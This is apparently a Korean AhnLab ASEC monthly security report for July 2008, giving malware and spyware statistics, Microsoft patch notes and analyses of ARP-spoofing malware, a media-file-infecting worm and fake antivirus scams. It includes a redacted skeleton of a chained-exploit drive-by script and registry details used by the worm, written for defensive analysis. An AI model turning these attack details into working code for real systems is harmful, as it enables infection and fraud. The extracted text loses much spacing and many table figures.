(Microsoft Word - ASEC Report 2008\263\3427\277\371\310\243.doc)
|
|
- 광민 포
- 5 years ago
- Views:
Transcription
1 ASEC Report 7월 ASEC Report I. ASEC 월간통계 2 (1) 7월악성코드통계 2 (2) 7월스파이웨어통계 12 (3) 7월시큐리티통계 16 II. ASEC Monthly Trend & Issue 19 (1) 악성코드 Win32/Kashu.B 재감염과메신저사용자를노린악성코드 19 (2) 스파이웨어 주춤하는국내스파이웨어 / 급증하는국외스파이웨어 23 (3) 시큐리티 네이트온쪽지를이용한악성코드전파 30 (4) 네트워크모니터링현황 34 (5) 중국보안이슈 38 III. ASEC 컬럼 44 (1) DNS(Domain Name System) 의 Cache Poisoning 취약점 44 (2) 오픈오피스와악성코드 52 안철수연구소의시큐리티대응센터 (AhnLab Security Emergency response Center) 는악성코드및보안위협으로부터고객을안전하게지키기위하여바이러스분석및보안전문가들로구성되어있는조직이다. 이리포트는 안철수연구소의 ASEC에서국내인터넷보안과관련하여보다다양한정보를고객에게제공하기위하여악성코드와시큐리티의종합된정보를매월요약하여리포트형태로제공하고있다.
2 I. ASEC 월간통계 (1) 7 월악성코드통계 Top 10 분석 7 월순위 악성코드명 건수 % 1 new Win-Trojan/Agent CM % 2 new Dropper/ARPSpoofer % 2 new Dropper/OnlineGameHack % 4 new Dropper/ARPSpooer % 5 new Win-Trojan/Downloader FU % 6 new Win-Trojan/Agent HJ % 7 new Win-Trojan/OnlineGameHack % 7 new Win-Trojan/OnlineGameHack G % 9 new Win-Trojan/Agent KM % 10 new Dropper/OnlineGameHack % 합계 % [ 표 1-1] 2008년 7월악성코드피해 Top 10 [ 그림 1-1] 2008 년 7 월악성코드피해 Top 10 2
3 [ 표 1-1] 은 2008년하반기를시작하는 7월악성코드로인한피해 Top 10에랭크된악성코드들을보여준다. Top 10에포함된악성코드들의총피해건수는 849건으로 7월한달접수된총피해건수 (6213건) 의 13.6% 에해당하며지난 5월 204건 (2.7%), 6월 315건 (4.7%) 에비해큰폭으로증가하였다. [ 그림 1-1] 은에서 Win-Trojan/Agent CM 과 Dropper/ARPSpoofer.17408, Dropper/OnlineGameHack 의비율이 16~13% 로다소많은비중으로차지하고있으 며나머지악성코드들은대부분 10% 미만의비율로큰차이를나타내지는않고있다. 지난달과비교하여특이할만한점은, 6월에 Top 10에랭크되었던다수의유해가능프로그램과웜형태의악성코드가 Top 10에서밀려났으며, Top 10에오른악성코드는모두드롭퍼 (Dropper) 와트로이목마유형의신종악성코드이다. 이는다수의악성코드들이자동화된악성코드제작툴을이용하여자동적으로제작되어다양한변종이생성되고있는것이원인으로분석된다. 지난달에비해 Top 10 에랭크된악성코드당피해건수는약 2 배이상증가하였는데, 이는 ARP Spoofing 을이용한트로이목마형태의악성코드가많은피해를일으킨것이주요원인 으로보인다. 비록 Top 10에는랭크되지않았지만국내메신저프로그램을이용해전파되는악성코드가발견되어관련담당자들을긴장시키기도했다. 유명외산메신저를이용해전파되는악성코드의경우, 국내사용자들이알수없는영문메시지등과함께악성코드가전달되는통로로메신저가악용되는것이많이알려져있기때문에, 사용자들이악성코드로의심하여전송받지않아서피해가줄어들고있는것으로추정되고있다. 그러나, 국내메신저를이용해전파된악성코드의경우한글로된메시지와함께전송파일명도한글로되어있는등외산악성코드에비해위화감이적어사용자들이별다른의심없이파일을전송받아피해가발생한것을보인다. 특히사용자들이주의해야할점은메신저를이용해전파되는악성코드대부분이이미지파일로위장하여보내는만큼실행파일이아니라고안심하고다운로드받아서는절대로안되며, 보내는사람에게꼭확인을한다음확인된파일만수신하는습관을가지는것이필요하다. 또한해외메신저로전파되는악성코드의경우또한전송되는파일명들이호기심을유발하기에충분한이름들로되어있는경우가많아악성코드로의심은하면서도혹시나하는마음에전송받아피해를입는일도없어야하겠다. 3
4 [ 그림 1-2] 2008 년악성코드피해 Top 10 의유형별현황 [ 그림 1-2] 는 7월악성코드피해 Top 10의악성코드들을유형별로나타낸것이다. 7월은 5 월 ( 트로이목마 91%, 드롭퍼 9%) 과 6월 ( 트로이목마 73%, 드롭퍼 11%) 에비해트로이목마의비율이 54% 로많이줄어들었으며드롭퍼가 46% 를차지하여트로이목마와비슷한비율을보이고있다. 지난 6월 Top 10에들어있던유해가능프로그램과웜은 7월에는 Top 10에들지못하고순위에서밀려났으며드롭퍼가 6월 11% 에서 43% 나증가한 54% 로나타나강세를보였다. 월별피해신고건수 [ 그림 1-3] 2007,2008 년월별피해신고건수 [ 그림 1-3] 은월별피해신고건수를나타내는그래프로 7 월은전체 6,213 건의피해신고가 4
5 접수되었으며지난달 6,634 건에서 400 건가량감소하였다 년 2 월 8,948 건에서 3,254 건으로크게감소된이후계속적으로증가되다가 5 월 7,650 건을기점으로감소추세를보이 고있다. 이는 2007 년 5, 6, 7 월과비교하면정반대현상이다. 지난 2007년과 2008년현재까지의통계를보면주로 2개월단위로증가와감소가반복되는것을볼수있으며이러한추세로볼때 8월은악성코드피해신고건수가증가하는주기이나, 8월에는휴가시즌등으로인해사용자의 PC 사용시간이줄어드는것을감안하면, 실제피해신고건수는줄어들것으로예상된다. [ 그림 1-4] 2008 년 7 월악성코드유형별피해신고건수 [ 그림 1-4] 는 2008년 7월전체악성코드유형별피해신고건수를나타내고있는그래프이다. Top 10의유형과마찬가지로전체피해신고유형을봤을때에도트로이목마와드롭퍼가각각 75%, 17% 가량으로높은비중을차지하고있으며지난달에비해트로이목마가 10% 정도줄어들었고, 드롭퍼가이비율만큼증가하였다. 스크립트와유해유해가능프로그램이소폭감소했으며, 꾸준히감소세를보이던바이러스는 7월에는 4건만이신고되었다. 5
6 [ 그림 1-5] 2008 년 7 월피해신고된악성코드의유형별현황 [ 그림 1-5] 는 7월한달간접수된유형별신고건수로 [ 그림 1-4] 의유형별피해신고건수와마찬가지로트로이목마가 82% 로여전히높은비율을차지하고있으며지난달 72% 에비해 10% 가증가하였다. 나머지가스크립트 5%, 드롭퍼 7%, 웜 4%, 유해가능프로그램이 2% 를골고루차지하고있으며바이러스는 4건의신고가있었다. [ 그림 1-6] 2008 년월별피해신고악성코드종류 [ 그림 1-6] 의 2008 년월별피해신고가되는악성코드의종류를나타낸그래프이다. 월별로 신고되는악성코드들의종류 [ 그림 1-3] 의월별피해신고건수와마찬가지로 2 월 1,364 건 으로감소한이후계속적으로증가하였으나 6 월에증가세가꺾여소폭감소하였다가 7 월에 6
7 는큰폭으로감소하여하강곡선이뚜렷해졌다. 7월에는악성코드종류는눈에띄게감소하였으나피해신고건수는지난 6월과비슷한수준을보이고있다. 악성코드종류로만보았을때에는마치악성코드가줄어들어피해가줄어들고있는것처럼보여질수있으나악성코드당피해는더욱증가하여악성코드로인한피해가좀처럼줄어들지않고있음을알수있다. 드롭퍼의증가와함께 ARP Spoofing으로인해악성코드가전보다빠르게확산되어피해를키운것으로보인다. 7월의악성코드피해통계에서눈에띄는점은 ARP Spoofing 관련악성코드변종이많아지고있으며, 실제피해건수도증가하는추세라는것이다. ARP Spoofing을이용한악성코드는동일네트워크를사용하는시스템중취약한하나의시스템에만감염이되어도전체네트워크장애로이어질수있고, 이로인해심각한업무장애를초래할수있다. 커다란댐도작은구멍하나로무너질수있듯이시스템개인사용자및기업의보안담당 자는잘사용하지않는시스템이라도항상백신제품의최신엔진업데이트와최신보안패치 가설치될수있도록신경을써야할것이다. 7
8 국내신종 ( 변형 ) 악성코드발견피해통계 7 월한달동안접수된신종 ( 변형 ) 악성코드의건수및유형은 [ 표 1-2] 와같다. 웜 트로이 드롭퍼 스크립트 파일 매크로 부트 부트 / 파일 유해가능 비윈도우 합계 05 월 월 월 [ 표 1-2] 2008년최근 3개월간유형별신종 ( 변형 ) 악성코드발견현황 지난달사상유례가없을정도로큰폭으로상승한신종 ( 변형 ) 악성코드발견건수는이번달에는약 17% 가량감소하였지만, 평균적으로발견된건수와비교해보면상당히높은수준이다. 7월에도변함없이 SWF 관련취약점과 ARP Spoofing을이용한중국발악성코드감염사례가다수발생하였으며, 이러한영향으로신종 ( 변형 ) 악성코드가평균이상으로발견되고있는것으로보인다. 실제로발견된신종 ( 변형 ) 악성코드개수가적어졌다고실제로제작되고있는악성코드가줄어들었다고단정할수없다. 그이유로는 SWF 관련취약점이포함된샘플에대한 Generic 한진단기능이대부분의백신프로그램들에포함되고, 플래시플레이어를배포하는대형포털또는웹사이트등에서취약한플래시플레이어를업데이트한것등으로인하여원천적으로악성코드가차단되어발견된악성코드가적어졌을것으로추정된다. 취약한 SWF 파일은대량으로악성코드를다운로드받아오는멀티다운로더를다운로드한다. 일반적으로이들멀티다운로더들은 10~20 개정도의악성코드를다운로드해서사용자 PC 에설치하며, 이들은실행후악의적인모듈을생성하므로하나의멀티다운로더로수십개의악성코드가시스템을감염시킬수가있었다. 따라서취약한 SWF 파일을 Generic 하게진단하게되어추가로설치되는악성코드수가감소한것으로추정된다. 다음 [ 그림 1-7] 은이번달악성코드유형을상세히분류한것이다. 8
9 [ 그림 1-7] 2008 년 07 월신종및변형악성코드유형 이번달은트로이목마의비율이 79% 로전월대비하여감소하였다. 특히온라인게임의사용자계정정보를훔쳐내는악성코드가큰폭으로감소하여전체적으로악성코드비율이감소하였다. 드롭퍼유형은 ARP Spoofing 증상을발생하는형태와국산메신저의사용자계정을훔쳐내는 Dropper/Natice 등이등장하면서전월대비 30% 가량증가하였다. [ 그림 1-8] 최근 3 개월간악성코드분류별발견개수 9
10 스크립트류는 5% 정도전월대비소폭감소하였다. 웜유형은 15% 정도증가하였으며그중에서도 Autorun 관련웜이소폭증가하였다. 유해가능프로그램류는모니터링프로그램, 패치류, 애드웨어가주를이루었다. 파일바이러스는 Win32/Dellboy 바이러스가 4종류보고되었다. 그리고악성코드에서주로사용되는악의적인실행압축프로그램 2종류를진단하도록엔진에추가하였다. 다음 [ 그림 1-9] 에서는트로이목마및드롭퍼의전체비중에서상당한비율을차지하는온 라인게임의사용자계정을탈취하는트로이목마의추세를살펴보았다. [ 그림 1-9] 온라인게임사용자계정탈취트로이목마현황 전월대비 38% 감소하였는데이와같은원인은위에서추정한것처럼 SWF 취약점파일에대한 Generic 진단및플래시플레이어에대한업데이트가주된원인으로추정된다. 또한대다수의변형을진단하지못하지만꾸준히해당트로이목마에대한변형군에대한 Generic 진단추가도신종악성코드발견개수감소에어느정도기여한다고추정된다. 그러나계속적인변형발생과진단을회피하도록하는다형성크립터로인하여해당진단법이커버할수있는기간은길지않은편이다. 6 월에는 SWF 취약점으로유례가없는정도로많은관련악성코드가보고되었으며, 7 월달 에는 ARP Spoofing 의영향으로 5 월달과비교하여관련악성코드가발견되었다. 따라서이 러한악성코드증가추세는앞으로도계속될것으로보인다. 또한멀티다운로더에의한악 성코드대량감염도해당악성코드유형의발견개수를폭발적으로증가시키는하나의요인 10
11 이다. 최근들어서는별도의실행압축을하지않고자체적으로스트링이나 API 를암호화하는형 태도증가하였다. 또한파일크기를랜덤으로늘리고쓰레기데이터를붙여안티바이러스 진단을우회하는등진단을회피하는형태도부쩍증가하고있다. 11
12 (2) 7 월스파이웨어통계 순위 스파이웨어명 건수 비율 1 New Win-Downloader/Makrea % 2 New Win-Downloader/Makrea % 3 New Win-Spyware/PWS.OnLineGame % 4 New Win-Dropper/PWS.Gamehack % 5 New Win-Spyware/PWS.OnlineGame % 6 New Win-Adware/Rogue.XpAntivirus % 7 New Win-Spyware/Zlob % 8 New Win-Dropper/Duno % 9 New Win-Spyware/Agent F 6 6% 10 7 Win-Spyware/Xema D 5 5% 합계 % [ 표 1-3] 2008년 7월스파이웨어피해 Top 10 [ 그림 1-10] 2008 년 7 월스파이웨어피해 Top 년 7 월변형을제외하고가장많은피해를입힌스파이웨어는 [ 표 1-3] 에서와같이스 파이웨어피해 Top10 의 1, 2 위를차지한다운로더마크레아 (Win-Downloader/Makrea) 이다. 12
13 다운로더마크레아는 ARP Spoofing 공격을시도하는트로이목마로서네트워크전체에영향을미칠수있으며, 온라인게임계정유출스파이웨어의설치를시도한다. 다운로더마크레아의영향으로온라인게임계정유출스파이웨어가스파이웨어피해 Top10의 3위 ~5위를차지한것으로추정된다. 스파이웨어피해 Top10에는기록되지않았으나 7월에사용자에게많은피해를입힌스파이웨어는허위안티-스파이웨어류의프로그램으로추정된다. 7월에도스파이웨어즐롭 (Win- Spyware/Zlob), 스파이웨어크립터 (Win-Spyware/Crypter) 의피해는줄어들지않았으며, 지난달 ASEC 리포트에서예상한바와같이이들스파이웨어에의해설치되는허위안티-스파이웨어의피해가증가하였다. 전체스파이웨어피해신고 983건에서허위-안티스파이웨어프로그램의피해신고는 142건으로약 14% 의비율을차지하고있다. 최근발견되는허위안티-스파이웨어프로그램은스파이웨어즐롭, 스파이웨어크립터등의다른스파이웨어에의해사용자동의없이설치되며, 바탕화면및화면보호기변경, 시스템트레이의허위경고메시지노출증상이나타나는경우가많다. 애드웨어로그안티스파이웨어 XP 2008(Win- Adware/Rogue.AntiSpywareXP2008) 의경우설치되는파일의경로명이랜덤하며, 많은변형이존재하기때문에보안프로그램이진단하기가어려운특징으로현재에도많은피해를입히고있다 년 7 월유형별스파이웨어피해현황은 [ 표 1-4] 와같다. 스파이 애드웨 드롭퍼 다운로 다이얼 클리커 익스플 AppCare Joke 합계 웨어류 어 더 러 로잇 5월 월 월 [ 표 1-4] 2008년 7월유형별스파이웨어피해건수 6월과비교하여스파이웨어에의한피해는약간증가하였으며, 애드웨어에의한피해는다소감소하였다. 전체적인수치는지난달과비슷한가운데허위안티-스파이웨어프로그램설치를유도하는스파이웨어크립터 (Win-Spyware/Crypter), 스파이웨어즐롭 (Win- Spyware/Zlob) 의피해신고건수가가장많았다. 13
14 7월스파이웨어발견현황 7 월한달동안접수된신종 ( 변형 ) 스파이웨어발견건수는 [ 표 1-5], [ 그림 1-11] 과같다. 스파이 애드웨 드롭퍼 다운로 다이얼 클리커 익스플 AppCare Joke 합계 웨어류 어 더 러 로잇 5월 월 월 [ 표 1-5] 2008년 7월유형별신종 ( 변형 ) 스파이웨어발견현황 [ 그림 1-11] 2008 년 7 월발견된스파이웨어프로그램비율 [ 표 1-5] 과 [ 그림 1-11] 는 2008 년 7 월발견된신종및변형스파이웨어통계를보여준다. 지난달과마찬가지로스파이웨어즐롭 (Win-Spyware/Zlob) 변형이많이발견되었으며, 이 에따른영향으로전체신종및변형스파이웨어발견건수가 6 월에비해다소증가하였다. 총 615개의신종및변형스파이웨어중국외에서제작된것으로추정되는것이 520개, 국내에서제작된것으로추정되는것이 95개로국외제작스파이웨어가국내제작스파이웨어보다월등히많은것으로나타났다. 일반적으로스파이웨어는국지적인성격을많이띠고있는것으로알려져있으나, 최근에는국내의경우에있어서스파이웨어의정의가어느정도정립이되었고, 상반기사이버수사대의수사를통한스파이웨어제작업체에경각심을심어주는 14
15 현상등으로인하여국내제작스파이웨어가주춤한반면, 상반기내내 ASEC report 에서언 급되었던스파이웨어즐롭, 스파이웨어크립터등으로인하여외산스파이웨어가다수설치 됨으로인하여외국에서제작된스파이웨어로인한피해가증가하고있는추세이다. 15
16 (3) 7 월시큐리티통계 2008년 7월에마이크로소프트사로부터발표된보안업데이트는총 4건으로모두긴급 (Critical) 에해당하는중요한패치들로서, 해당하는취약점들은 MSSQL 서버, 윈도우탐색기, DNS 서비스등과같이그이름만으로도사용자들에게익숙한중요한서비스및어플리케이션들이다. MS 취약점은 SQL 서버백업파일형식인 MTF(Microsoft Tape Format) 파일에존재하는취약점을악용하여 MSSQL 서버를공격하는취약점으로, 현재알려진공격코드 (PoC) 는존재하지않지만 SQL 서버운영자들은즉시패치를적용하고, 지속적인주의를기울여야할것이다. MS DNS 취약점 1 의경우, 공격자가취약점을통해손쉽게 DNS 응답에필요한정보를유추하여조작된 DNS 응답을 DNS 서버캐쉬에삽입하는방식으로공격을수행할수있다. DNS 서버는인터넷환경에서아주핵심적기능을수행하고있기때문에해당시스템이공격당하는경우그피해가매우크다. 이에대해서는컬럼에서보다상세한내용을다루고있다. [ 그림 1-12] 공격대상기준 MS 보안패치현황 (2007 년 8 월 ~ 2008 년 7 월 )
17 위험도긴급긴급긴급 취약점 (MS08-040) Microsoft SQL Server 의취약점으로인한권한상승문제점 (MS08-039) Exchange Server 용 Outlook Web Access 의취약점으로인한권한상승문제점 (MS08-038) Windows 탐색기의취약점으로인한원격코드실행문제점 PoC 무무무 긴급 (MS08-037) DNS 의취약점으로인한스푸핑허용문제점 (953230) 유 [ 표 1-6] 2008 년 7 월발표된주요 MS 보안패치 2008 년 7월웹침해사고현황 [ 그림 1-13] 악성코드배포를위해침해된사이트수 / 배포지수 이달의웹사이트경유지 / 유포지수는 256/67 으로지난달의 329/57 에비해경유지의수 는감소하였지만유포지의수가소폭증가하였다. 소수의공격자의의해다수의웹사이트가 침해되고있는경향은여전하다. 2008년 7월결과에서특이한점은그동안에발견되지않았던새로운취약점을이용해악성코드를배포한예가발견되고있다는것이다. MS Microsoft speech active 취약 점 1 이나 MS Access Snapshot Viewer 취약점을이용해악성코드배포를시도한사례가발 견되었는데, 특히 MS Access Snapshot Viewer 취약점은아래 [ 그림 1-14] 와같은방식으
18 로배포를시도하고있으며, 현재정식패치가발표되지않았기때문에사용자들의특별한주 의가필요하다. 아직은다른취약점들에비해해당취약점들을이용한악성코드의배포가흔 하지는않지만점점그수가늘어날가능성에주목해야한다. [ 그림 1-14] MS Access Snapshot Viewer 취약점공격코드일부 이러한웹을이용해배포되는악성코드는운영체제나서드파티제품의취약점을이용하여배포되기때문에일반 PC 사용자들은운영체제뿐아니라서드파티제품의보안상태를항상확인하고제품상태를항상최신으로유지하여야한다. 또한 AV 제품을설치하여자신의 PC를보호하여야한다. 그리고침해사고를확인한웹사이트의관리자들은사이트의사후관리에신경을써그영향을최소화해야한다. 18
19 II. ASEC Monthly Trend & Issue (1) 악성코드 Win32/Kashu.B 재감염과메신저사용자를노린악성코드 ARP Spoofing 공격을발생하는중국산악성코드가 7월한달많은피해를입혔다. 일부고객들로부터는 Win32/Kashu.B 바이러스에대한재감염이슈가있었으며스팸메일러를이용한허위안티바이러스프로그램설치와피해문의가대량으로보고되었다. 또한국산메신저사용자를노린악성코드가처음발견되었으며이외에도미디어파일을감염시켜악의적인 URL 을삽입하는형태가처음으로보고되었다. Win32/Kashu.B 재감염이슈 Win32/Kashu.B 1 는기존에알려진 Win32/Sality 바이러스의변형이며원형과큰차이는없다. 그러나일부사용자로부터재감염이슈가보고되었는데, 이바이러스에감염된파일을실행하면마치메모리상주형바이러스처럼동작하는데실행중인프로세스를감염시키는쓰레드 5개와특정호스트로부터다른악성코드를받아오거나로컬드라이브의파일을감염시키는쓰레드등모두 11개의쓰레드를생성한다. 이중프로세스를감염시키는쓰레드는다시파일을감염시키는쓰레드를포함하는데이와같은이유로파일진단 / 치료전메모리에서악의적인쓰레드를제거하지않으면치료후에도재감염되는사례가발생한다. Win32/Kashu.B 바이러스에감염이되었다면안철수연구소홈페이지에서전용백신을다운로 드하여반드시검사및치료를해야만재감염되지않는다. [ 그림 2-1] Win32/Kashu.B 전용백신
20 국산메신저사용자를노린 Dropper/Natice 7 월초국내에서잘알려진메신저와해당계정을가지고있는일련의사용자들은악성코드 가링크된 URL 을받았다. 이는마치지난 5 월에국내대형포털의웹메일계정사용자를 노렸던허위고소장관련메일과어느정도연관성을배제할수없다고추정된다. 누군가가대량으로해당메일주소를획득했을것이고이를통하여악성코드설치를유도한것으로추정되기때문이다. *.jpg 로된위링크를클릭하면특정실행파일이다운로드된다. Dropper/Natice이며실행하면강아지그림이보여지지만백그라운드로악성코드가설치된다. 해당악성코드는다음과같이특정메신저를찾아내고해당프로세스의특정메모리영역에 대한읽기와쓰기를시도한다. 그러나버그인지는알수없으나 FindWindowA 이후가상메 모리영역에대한 VirtualProtect 이후종료되어버린다. [ 그림 2-2] Win-Trojan/Natice 관련코드일부 문서를작성하는현재에도변형이다수보고되었다. 따라서해당악성코드에대한피해또 는발견신고는더증가할것으로도예상된다. 국내대형온라인쇼핑몰에대한사용자정보유출후국내포털사용자의메일주소를이용하여악성코드유포가 5월에있은지얼마후에다른포털사용자를노린형태가발견된것이다. 이는악성코드제작자들이온라인게임의사용자계정탈취를넘어서국내포털사용자들의계정정보까지노리고있는것으로보인다. 이러한사례는국외에서는종종보고되었으나국내에서본격적으로유사악성코드가발생하는것은처음있는형태로보여진다. 실시간으로메시지를확인할수있는메신저의계정이노출된경우에는메시지를통한광고및사용자를가장하고금전적인피해도일으킬수있는만큼각별한주의가필요하다. 미디어파일을위협하는 Win32/Getcodec.worm 미디어파일을감염시키는악성코드가처음으로등장하였다. 감염이아닌처음부터악의적인 웹사이트로유도하도록링크를삽입하는형태는있었다. 또한악성코드에의한미디어파일 을삭제하는것과같은파괴적인증상으로피해를입혔으나이번에보고된 Win32/Getcodec.worm 은다음과같은미디어파일에대하여감염증상을일으킨다. 20
21 - *.MP2, *.MP3, *.WMA, *.WMV, *.ASF 이악성코드는로컬드라이브에서위파일을찾아내어 MP2, MP3와같은포맷의파일의경우 ASF 포맷으로변환한후해당파일에특정스크립트 (URL 형태 ) 를삽입한다. 이와같이미디어파일이감염되어악의적인목적으로사용될수있는것은해당확장자를재생할수있는윈도우미디어플레이어의기능때문이다. 윈도우미디어플레이어에서는재생하는파일중위와같이 *.WMA, *.WMV, *.ASF 포맷내특정스크립트가존재하는경우해당스크립트를실행할수가있다. 이는 AddScript method(windows Media Format SDK 지원 ) 를통해 URLANDEXIT 와같은사용자정의명령으로음악파일에스크립트삽입이가능하기때문이다. 또한다음과같이실행후레지스트리키값을변경함으로써미디어플레이어에서해당스크립트가문제없이실행되도록해둔다. 기본값은실행되지않도록되어있다. HKEY_CURRENT_USER\SOFTWARE\Microsoft\MediaPlayer\Prefere nces URLAndExitCommandsEnabled: 0 (1 이면실행불가 ) 해당웜의코드를살펴보면다음대상확장자파일에대한입력을받는부분, 해당확장자를 비교하는부분, 스크립트감염루틴부분등으로이루어져있다. [ 그림 2-3] Win32/GetCodec.worm 코드일부 다음 [ 그림 2-4] 의 Flow 는위코드에서 WMV, WMV 확장자감염루틴을수행했을때이다. 21
22 [ 그림 2-4] WMA, WMV 파일에대한감염루틴 악성코드는 MP2, MP3 의확장자의경우감염전 ASF 포맷으로변환과정을거치는데테스트과정에서는재현되지않았다. 또한변환과정에는 MP3 재생으로유명한 Winamp 의특정모듈이필요하므로 Winamp 가설치되어있어야만한다. 그이외의확장자는바로스크립트를감염시키는데위와같이기감염되어있으면감염루틴은종료된다. 감염된미디어파일을실행하면특정호스트로부터파일을내려받는다운로드윈도우가활성화된다. 해당파일은백도어증상을가지고있어사용자정보가노출될수있다. 22
23 (2) 스파이웨어 주춤하는국내스파이웨어 / 급증하는국외스파이웨어 2008년들어국내샘플접수는점차감소하고국외샘플접수량이증가하는추세를보이고있다. 특히최근에접수된해외샘플중허위안티-스파이웨어인안티바이러스2008(Win- Adware/Rogue.AntiVirusXP20008) 의경우여러감염경로를가지고있다. 그중젤라틴웜 (Win32/Zhelatin.worm) 을이용하여악의적인웹페이지경로를통하여배포하고있어그피해가점차증가되고있는상황이다. 최근스파이웨어유포방식과피해 악성코드가유포되는다양한경로를아래 [ 그림 2-5] 와같이종합적으로도식화하였다 2 스파이웨어배포자 1 WORM 취약점 4 사용자 3 사회공학기법 5 스파이웨어 7 결제 6 [ 그림 2-5] 악성코드유포경로 1. 악의적인웹페이지게시 악성코드배포자는정상적인웹사이트를해킹하여정상적인웹페이지를조작하거나, 악의적 인웹페이지를숨겨놓거나, 특정사이트게시판에악의적인글을작성한다. 이는마치신 뢰된사이트에서제공하는링크인것처럼보이게하며, 일반사용자들이무의식적으로클릭 23
24 을하게되면공격자가의도한웹페이지로접속하게된다스파이웨어배포를위하여, 동영상을보기위한코덱설치유도와같은방식등다양한사회공학적기법이많이사용되고있는데, 점차사용자의보안인식이높아지고보안패치가적용되는 PC가증가함으로써스파이웨어배포를위한새로운방법으로기존의악성코드유포방식이사용되고있다. 2. 웜배포 1 번에서스파이웨어배포자가작성한웹페이지경로를이메일내용에포함시켜서이메일 웜을통하여일반사용자가해당웜이메일을클릭하여스파이웨어가배포되도록한다. [ 그림 2-6] 악의적인이메일전송화면 위 [ 그림 2-6] 은특정메일이 APF(Ahnlab Personal Firewall) 2004 에의해전송실패된로 그화면으로메일내용은 [ 그림 2-7] 과같다. [ 그림 2-7] 유명뉴스관련메일로위장한악의적인이메일 24
25 3. 사용자가악의적인웹페이지에접속 [ 그림 2-7] 과같이유명뉴스사이트에서보내온것처럼꾸며진이메일을받고사용자는아무런의심없이메일내용을확인하게된다. 메일내용중에관심있는글을자세히보기위해글제목을클릭하게되면사용자가원하는페이지는보이지않고 1번에서작성한악의적인웹페이지가나타나게된다. 4. 취약점을이용한악성코드유포 이렇게악의적인웹페이지까지접근한사용자가의심하고프로그램설치를하지않을경우 를대비하여취약점을이용한스파이웨어설치기능이포함되어있다. 아래 [ 그림 2-8] 과같 은코드로인해윈도우시스템이패치되지않은사용자에한해서사용자의클릭여부와는상 관없이자동으로스파이웨어가다운로드되고실행된다. <script> {MS 취약점을이용한악성코드다운로드 } {Spray 데이터생성 } {Shellcode} function startcreatecontrolrange() { ( 생략 ) settimeout("startsuperbuddy()", 3000); } function startsuperbuddy() { ( 생략 ) settimeout("startgom ()", 2000); } function startgom() { ( 생략 ) settimeout("startrealplayer()", 2000); } ( 생략 ) startcreatecontrolrange(); </script> [ 그림 2-8] 취약점을이용한악성코드배포스크립트 [ 그림 2-8] 을자세히살펴보면하나의취약점을이용하는것이아니라다양한취약점들을각각의함수로작성하여순차적으로실행되도록하였다. 더욱이사용된취약점들을살펴보면윈도우취약점인 MS 뿐만아니라국내인기프로그램인 곰플레이어 의취약점 2 을이용한코드도존재하였다
26 5. 사회공학기법을이용한악성코드유포위에서도간략히언급한바와같이최근에는윈도우의보안이보다강화되었고보안에대한사용자인식이높아져보안패치및안티-스파이웨어제품을설치하여사용하는사용자들이증가되어취약점등을이용한웬만한기술로는사용자 PC에접근하기가어려워졌기때문에스파이웨어배포자들은사회공학적기법을사용한다. 스파이웨어배포를위하여주로사용되는사회공학적기법으로는특정동영상을보기위하여추가적인프로그램설치를유도하거나, 검색포털인기검색어 TOP10에해당하는키워드로악의적인게시물을작성하거나, 사용자동의를받기위해제공하는약관을읽기어려운형태로제공하거나, 불공정약관을제공하는등의방법이악용되고있다. 6. 결제유도지금까지살펴본방법으로악의적인웹페이지에접속했을때, 사용자 PC에는여러스파이웨어가설치된다. 설치된스파이웨어중스파이웨어즐롭 (Win-Spyware/Zlob) 은사용자시스템설정을변경하여사용자에게공포심을유발한다. 자세한감염증상은뒷부분에서살펴보겠다. 스파이웨어즐롭에의해서사용자가시스템이이상한것을느끼고있을때, 스파이웨어즐롭에의하여설치된허위안티-스파이웨어인 안티바이러스XP2008 이동작하여시스템검사결과많은스파이웨어가발견되었다고 [ 그림 2-9] 와같이메시지를출력한다. [ 그림 2-9] 안티바이러스 XP2008 의허위시스템검사결과출력 결국불안감을느낀사용자는 안티바이러스 XP2008 허위안티 - 스파이웨어로치료를하려 고할것이고, 치료를위해서는아래 [ 그림 2-10] 과같은결재페이지가나타난다.. 26
27 [ 그림 2-10] 안티바이러스 XP2008 으로치료하기위해결제를요구하는화면 7. 또다른악성코드유포위에서살펴본봐와같이결국스파이웨어는사용자로부터금전적이득을취하기위해다양한방법을사용하고있는것을살펴보았다. 그러나스파이웨어배포자는여기서더나아가허위안티-스파이웨어인 안티바이러스XP2008 을불법으로사용하기위해크랙을찾는사용자들을위해크랙을가장한스파이웨어도미리배포해놓은상태이다. [ 그림 2-11] 안티바이러스 XP2008 크랙을다운로드받는웹페이지 따라서사용자는 안티바이러스 XP2008 크랙파일을다운로드받아실행할경우또다른 스파이웨어에감염된다. 스파이웨어의증상 사용자 PC 에설치된스파이웨어가사용자시스템설정을변경하여사용자의불편함을초래 하거나공포심을유발하는대표적인증상들을살펴보면다음과같다. 27
28 안티바이러스 XP2008 은윈도우시스템복원기능을변경함으로써일반사용자가시스템을 복원하지못하도록방해하는기능이포함되어있다. 이러한기능으로기존에저장된시스템 복원시점을모두잃을수있어높은위험도를가지고있다. [ 그림 2-11] 윈도우시스템복원데이터조작결과 안티바이러스 XP2008 은바탕화면과화면보호기를변경한다. 사용자가변경된설정을바꾸 기위해디스플레이등록정보를실행시켰을때, 스파이웨어에의해서변경할수있는인터 페이스를숨겨놓은상태이다. [ 그림 2-12] 디스플레이설정변경 드랍퍼즐롭 (Win-Dropper/Zlob ) 은사용자의불안감을유발시키기위해 내컴퓨터 에등록된하드드라이브를숨기고, 시스템날자표기방법을변경하여파일모니터링도구 에서시간이표기되는부분에 VIRUS_ALERT! 라는문구를삽입하는등여러시스템설정 을변경한다. 28
29 [ 그림 2-13] 내컴퓨터 에등록된하드드라이브숨김 [ 그림 2-14] 시스템날짜가변경된화면 국외스파이웨어가증가하면서국내에서는좀처럼접하기힘들었던일본허위안티 - 스파이 웨어인세이그요 (Win-Adware/Rogue.VirusSeigyo) 가 ALJ(AhnLab Japan) 으로부터접수되 어진단추가되었다. [ 그림 2-15] 일본판허위안티스파이웨어인세이그요메인화면 29
